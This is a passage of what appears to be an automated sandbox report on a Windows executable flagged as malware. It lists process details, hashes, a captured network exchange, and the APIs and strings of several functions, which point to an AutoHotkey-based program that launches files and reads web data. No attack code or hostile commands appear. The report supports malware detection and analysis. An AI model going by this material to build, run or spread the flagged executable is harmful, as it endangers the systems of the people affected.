2024-07-05 01:36:13 UTC	1370	IN	Data Raw: 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 73 74 69 63 6b 79 2d 73 63 72 6f 6c 6c 2d 69 6e 74 6f 2d 76 69 65 77 5f 74 73 2d 34 64 64 32 32 64 39 35 39 36 32 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 Data Ascii: /javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-4dd22d959621.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/asset

Target ID:	0
Start time:	21:36:08
Start date:	04/07/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe"
Imagebase:	0x400000
File size:	5'805'568 bytes
MD5 hash:	D4D645CB0C89359D63A331158CB81EED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.4%
Total number of Nodes:	787
Total number of Limit Nodes:	46

Executed Functions

Function 00430B40 Relevance: 46.1, APIs: 5, Strings: 21, Instructions: 601COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00430D9F
_sprintf.LIBCMT ref: 00430E24
CloseHandle.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000044,00000000), ref: 00430EC0
CloseHandle.KERNEL32(?,0000003C,0000003C), ref: 00430F01
_memset.LIBCMT ref: 00430F3E

Strings

D, xrefs: 00430DAA
..., xrefs: 004311AD, 004311CF, 004311F0, 004311F9
Failed attempt to launch program or document:, xrefs: 004311EB, 004311FB
properties, xrefs: 00430BF7, 00430CB1, 00430F80
String too long., xrefs: 00430D70
explore, xrefs: 00430BAF, 00430C69
Launch Error (possibly related to RunAs):, xrefs: 004311E4
<, xrefs: 00430F4C
", xrefs: 00430FBF
\/., xrefs: 0043102B
System verbs unsupported with RunAs., xrefs: 00430D28
GetProcessId, xrefs: 004310D8
print, xrefs: 00430BE5, 00430C9F
%sAction: <%-0.400s%s>%sParams: <%-0.400s%s>, xrefs: 004311FC
open, xrefs: 00430BC1, 00430C7B
edit, xrefs: 00430BD3, 00430C8D
Verb: <%s>, xrefs: 00431172
.exe.bat.com.cmd.hta, xrefs: 00431053
"%s" %s, xrefs: 00430E1E
find, xrefs: 00430B9D, 00430C57
kernel32.dll, xrefs: 004310DD

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseHandle_memset$_sprintf
String ID: Verb: <%s>$"$"%s" %s$%sAction: <%-0.400s%s>%sParams: <%-0.400s%s>$...$.exe.bat.com.cmd.hta$<$D$Failed attempt to launch program or document:$GetProcessId$Launch Error (possibly related to RunAs):$String too long.$System verbs unsupported with RunAs.$\/.$edit$explore$find$kernel32.dll$open$print$properties
API String ID: 736012798-2383331099
Opcode ID: c73f3bc381f9d56fc3863b4e0152685ceae93a9af9dbcae9bfb03ed0ce63eba3
Instruction ID: d7283c9ebcaa3fc6a490867846078583379e2bd33322fc91c68673749f4fbe7f
Opcode Fuzzy Hash: c73f3bc381f9d56fc3863b4e0152685ceae93a9af9dbcae9bfb03ed0ce63eba3
Instruction Fuzzy Hash: 8022D070E002499BEF24DF69CC51BAF7BA4AB49304F14526BE804A7381E77CDD45CBA9

Function 0040155F Relevance: 5.3, APIs: 3, Instructions: 848COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7cc5516447859dc8ac03cd5f2f6977bb0674161734f8a86d5f43ba6d6cad31c
Instruction ID: a0a9e3b7b6fa7fb7199dd5a3559db05cd2f2c2a30dfebe56bdec7c9c7a2e6647
Opcode Fuzzy Hash: b7cc5516447859dc8ac03cd5f2f6977bb0674161734f8a86d5f43ba6d6cad31c
Instruction Fuzzy Hash: 5162DE705043419FDB20DB69C894B6BBBE4AB85304F18497FE8956B3E1C37CD885CB5A

Function 00452C79 Relevance: 3.1, APIs: 2, Instructions: 82
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetReadFileExA.WININET ref: 00452D04
InternetCloseHandle.WININET ref: 00452D13

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Internet$CloseFileHandleRead
String ID:
API String ID: 3169938623-0
Opcode ID: 76e80bbfda201117c841759e3f9bdf24d55d45c590532fbdfcc8851d6c4844ac
Instruction ID: 66c51ee04e995426c2a70b47fc6d82a3626fd5ce919b6ea836b832ae3336e3a5
Opcode Fuzzy Hash: 76e80bbfda201117c841759e3f9bdf24d55d45c590532fbdfcc8851d6c4844ac
Instruction Fuzzy Hash: FB21C87290031066D160B755DD81F7FB3E89BC5B01F004A2FF944961C2DAA8E84887BA

Function 004757E0 Relevance: 1.7, APIs: 1, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8cd0731a72b4c59fdb579bad45c810edb1dc4db92c2b8fef40b359aeaf9b39e
Instruction ID: 3fe9e1b8b66fbca0fc26cc1e52917296cfbd7196b427797fe10ceee131bc35aa
Opcode Fuzzy Hash: b8cd0731a72b4c59fdb579bad45c810edb1dc4db92c2b8fef40b359aeaf9b39e
Instruction Fuzzy Hash: B5417B71804B45ABD731EA248C05BEBB7989F81315F05851AFC5C8B382EB7CA91A8396

Function 00417326 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(?,AutoHotkey,?,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000), ref: 00417357

Strings

AutoHotkey, xrefs: 0041734C
Consolas, xrefs: 0041740C
edit, xrefs: 004173E6
CreateWindow, xrefs: 00417373
Lucida Console, xrefs: 00417413, 00417418

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateWindow
String ID: AutoHotkey$Consolas$CreateWindow$Lucida Console$edit
API String ID: 716092398-735181289
Opcode ID: b03a47bda8a935287d15b2fab69bc45d3853114e4ba3e2da1b0043323e099231
Instruction ID: 4a0d6fa38886e5478ad4bb05fe9c7f6710cb635504a4dc4dc7ebb90543ee83ec
Opcode Fuzzy Hash: b03a47bda8a935287d15b2fab69bc45d3853114e4ba3e2da1b0043323e099231
Instruction Fuzzy Hash: B421D0B17C030179FA20A7359C07FB73A5CE751F11F70067ABB14EA1C1DAA9A854826D

Function 00403F40 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 265
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__fassign.LIBCMT ref: 00404069

Strings

/ErrorStdOut, xrefs: 00404063
Out of memory., xrefs: 00403FBA
AutoHotkey, xrefs: 0040420C, 00404275
A_Args, xrefs: 004040E4, 00404115
/force, xrefs: 0040404F
An older instance of this script is already running. Replace it with this instance?Note: To avoid this message, see #SingleInstance in the help file., xrefs: 00404247
/restart, xrefs: 0040402B

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __fassign
String ID: /ErrorStdOut$/force$/restart$A_Args$An older instance of this script is already running. Replace it with this instance?Note: To avoid this message, see #SingleInstance in the help file.$AutoHotkey$Out of memory.
API String ID: 3965848254-2568221545
Opcode ID: 8788ed7a7e83e216a64fb9a0836fe92677e122d8c27bc7c912ed7cf66ce9fe04
Instruction ID: a4728952536715e6b1800b0d43e0c043b49a698fe4db51916ef2c58866c6287e
Opcode Fuzzy Hash: 8788ed7a7e83e216a64fb9a0836fe92677e122d8c27bc7c912ed7cf66ce9fe04
Instruction Fuzzy Hash: 19814CB17042015AEB20AB66AC45B6B3B989BD2308F04057FFA40A73D1EB7CDD45C79E

Function 004C6697 Relevance: 10.6, APIs: 7, Instructions: 105
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 004C66C8
__mtterm.LIBCMT ref: 004C66EB

Part of subcall function 004C7A64: TlsFree.KERNEL32(00000017,004C6752), ref: 004C7A8F

__setenvp.LIBCMT ref: 004C66FB
__cinit.LIBCMT ref: 004C6706
__mtterm.LIBCMT ref: 004C674D
___set_flsgetvalue.LIBCMT ref: 004C675E

Part of subcall function 004C7A30: TlsGetValue.KERNEL32(?,004C6763), ref: 004C7A39
Part of subcall function 004C7A30: TlsSetValue.KERNEL32(00000000,004C6763), ref: 004C7A5A

Part of subcall function 004CA152: __calloc_impl.LIBCMT ref: 004CA163

Part of subcall function 004C6EA4: ___sbh_find_block.LIBCMT ref: 004C6ECD
Part of subcall function 004C6EA4: ___sbh_free_block.LIBCMT ref: 004C6EDC
Part of subcall function 004C6EA4: HeapFree.KERNEL32(00000000,004C54DF,004D4CF8,0000000C,004CC1F0,00000000,004D4FE8,0000000C,004CC22A,004C54DF,004C54DF,?,004C8342,00000004,004D4DE8,0000000C), ref: 004C6F0C

__freeptd.LIBCMT ref: 004C67BD

Memory Dump Source

Source File: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FreeValue__mtterm$HeapInitialize___sbh_find_block___sbh_free_block___set_flsgetvalue__calloc_impl__cinit__freeptd__setenvp
String ID:
API String ID: 3004107213-0
Opcode ID: 51772169da022ad5ac45df798bd04f277ee3f7ca89acad74f90ad2ad7ec30ad8
Instruction ID: 6fd4c3f7d651985e2a1e4bffae2af3fa626d54f2835365c8650adab9dc5041e2
Opcode Fuzzy Hash: 51772169da022ad5ac45df798bd04f277ee3f7ca89acad74f90ad2ad7ec30ad8
Instruction Fuzzy Hash: 2A21D73D106606AA9BE177735D46F2F3358AF9076CB22883FF404C0192EE2DC562996F

Function 00430F21 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00430F3E

Strings

", xrefs: 00430FBF
GetProcessId, xrefs: 004310D8
properties, xrefs: 00430F80
<, xrefs: 00430F4C
kernel32.dll, xrefs: 004310DD

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memset
String ID: "$<$GetProcessId$kernel32.dll$properties
API String ID: 2102423945-899836987
Opcode ID: 01ef340641474c55a6c1d7fc16161ca3833c807c3329cb53036237d67f1ce7cf
Instruction ID: 50bf1a89ea3a6eba7e683be680fa2be4258c21ae3b88b21488fa0906a51cb8a8
Opcode Fuzzy Hash: 01ef340641474c55a6c1d7fc16161ca3833c807c3329cb53036237d67f1ce7cf
Instruction Fuzzy Hash: 1931CE70E0438A8FDF21CFA488557AF7BF4AF09344F14116AE804AB391D7B88901CB59

Function 0041739C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000000,edit,00000000,50A00804,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004173ED
MulDiv.KERNEL32(0000000A,00000000), ref: 0041743F
CreateFontA.GDI32(00000000,?,00000000,0000005A,00000048,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00417448

Strings

Consolas, xrefs: 0041740C
edit, xrefs: 004173E6
Lucida Console, xrefs: 00417413, 00417418

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Create$FontWindow
String ID: Consolas$Lucida Console$edit
API String ID: 4090830772-3990788744
Opcode ID: 901d0c95761ecbfda624d98c91e9525446feb2248bfed6535ad350a437d57a3e
Instruction ID: c64470b509216faf9f91db717f79307b6b07b3f7c31230e3a28f28edd3e58283
Opcode Fuzzy Hash: 901d0c95761ecbfda624d98c91e9525446feb2248bfed6535ad350a437d57a3e
Instruction Fuzzy Hash: 7C01B5B17883017AFA30A7329C07F773E5CEB92B10F104179BA14AB2D0D6E86C40876D

Function 00452A10 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 221
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wcstoi64.LIBCMT ref: 00452A44

Part of subcall function 00489461: __wcstoi64.LIBCMT ref: 0048946D

Strings

AutoHotkey, xrefs: 00452A85
(, xrefs: 00452BA8

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __wcstoi64
String ID: ($AutoHotkey
API String ID: 398114495-2766205875
Opcode ID: 79e2c887eee821065f8effa072cdb362e0199da077ea884acfe0b5eb1513185d
Instruction ID: b5c7375bffa3673c8ba6dd95a13578f3808fcd739fbc2fce6a1855213f137d37
Opcode Fuzzy Hash: 79e2c887eee821065f8effa072cdb362e0199da077ea884acfe0b5eb1513185d
Instruction Fuzzy Hash: F0615A716443002BD230EB249D81F7FB7D8ABC6755F54092FFA8096282D7BD9C4987AE

Function 0048A68C Relevance: 4.6, APIs: 3, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__flush.LIBCMT ref: 0048A745
__write.LIBCMT ref: 0048A76C
__flsbuf.LIBCMT ref: 0048A797

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __flsbuf__flush__write
String ID:
API String ID: 238842559-0
Opcode ID: 3a8a99b6ac0a8981e5f55cfc3b73a4b5b15fd2140bc1f813eb34e8b4d94d7acd
Instruction ID: c6301ebd2c17aeec1e123fe8020fd801464ceeb290c259e3aeb8bfd7d38589be
Opcode Fuzzy Hash: 3a8a99b6ac0a8981e5f55cfc3b73a4b5b15fd2140bc1f813eb34e8b4d94d7acd
Instruction Fuzzy Hash: 0141D931A006049FFB24BF65844455FB7B5AF80710F28492FE855A7240E7B8ED61AB4A

Function 00426844 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 784COMMON

Download Yara Rule

Strings

SMHD, xrefs: 00427AB7, 00427D23

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: SMHD
API String ID: 0-3383697735
Opcode ID: 01484b1fb0bc7e5b57988757c26611954cd2cf617635e8d83f462f81a7f52fe3
Instruction ID: c86999a43269906a556a7fac5c1e459da259cc4c35876072cdec5955acc446df
Opcode Fuzzy Hash: 01484b1fb0bc7e5b57988757c26611954cd2cf617635e8d83f462f81a7f52fe3
Instruction Fuzzy Hash: D55214707083608BE720DF25E881B7B77E2AB81314FA5446FE9454B392C779EC85CB5A

Function 004042F5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0040436C

Strings

Clipboard, xrefs: 004043A1

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memset
String ID: Clipboard
API String ID: 2102423945-220874293
Opcode ID: 28267301d4c4999ac1653b39c0050ea2a994e22d6e8c3f69f0fbd0017c0301e6
Instruction ID: 083a4729c8b2acf5ed42ebb152848538d5a50b90c0ba951ee7b6689d54149aa6
Opcode Fuzzy Hash: 28267301d4c4999ac1653b39c0050ea2a994e22d6e8c3f69f0fbd0017c0301e6
Instruction Fuzzy Hash: 1011E9B2B4430035F63073A66D07F5B2A449B92718F54157FFF04B92C2DAFD985486AE

Function 004C54C0 Relevance: 3.1, APIs: 2, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 004C54DA

Part of subcall function 004C836F: __FF_MSGBANNER.LIBCMT ref: 004C8392
Part of subcall function 004C836F: __NMSG_WRITE.LIBCMT ref: 004C8399
Part of subcall function 004C836F: RtlAllocateHeap.NTDLL(00000000,004C54D0), ref: 004C83E6

std::bad_alloc::bad_alloc.LIBCMT ref: 004C54FD

Part of subcall function 004C54A5: std::exception::exception.LIBCMT ref: 004C54B1

Memory Dump Source

